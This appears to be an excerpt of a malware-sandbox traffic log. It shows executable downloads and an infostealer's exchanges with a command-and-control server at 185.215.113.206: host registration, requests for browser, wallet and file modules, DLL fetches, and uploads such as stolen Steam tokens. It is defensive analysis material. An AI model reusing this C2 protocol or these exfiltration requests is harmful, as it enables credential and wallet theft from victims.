00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 Jan 2025 15:51:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 Jan 2025 15:51:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 31 37 30 37 43 30 31 46 45 46 33 34 38 39 38 38 39 34 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 72 61 74 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 2d 2d 0d 0a Data Ascii: ------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="hwid"941707C01FEF3489889415------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="build"brat------GDAECAECFCAAEBFHIEHD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="message"browsers------BKJJJDHDGDAAKECAKJDA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="message"plugins------HJKJKKKJJJKJKFHJJJJE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAKHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 2d 2d 0d 0a Data Ascii: ------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="message"fplugins------AFBAFBKEGCFBGCBFIDAK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.215.113.206Content-Length: 5739Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHCHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 2d 2d 0d 0a Data Ascii: ------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="file"------FBFCAKKKFBGDGCAKFCFH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 2d 2d 0d 0a Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file"------BKJKJEHJJDAKECBFCGID--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEBHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 2d 2d 0d 0a Data Ascii: ------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="message"wallets------FIIECFHDBAAECAAKFHDH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 2d 2d 0d 0a Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="message"files------IIEHCFIDHIDGIDHJEHID--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 37 65 38 33 36 61 37 31 34 35 66 32 62 33 63 37 36 66 32 37 37 31 34 32 63 66 65 30 30 34 38 62 61 61 39 63 30 61 33 35 30 39 61 61 65 66 30 33 39 39 36 32 30 61 65 33 35 38 35 36 64 62 37 35 36 62 34 30 30 63 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="token"17e836a7145f2b3c76f277142cfe0048baa9c0a3509aaef0399620ae35856db756b400ce------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="file"------IDAAKEHJDHJKEBFHJEGD--
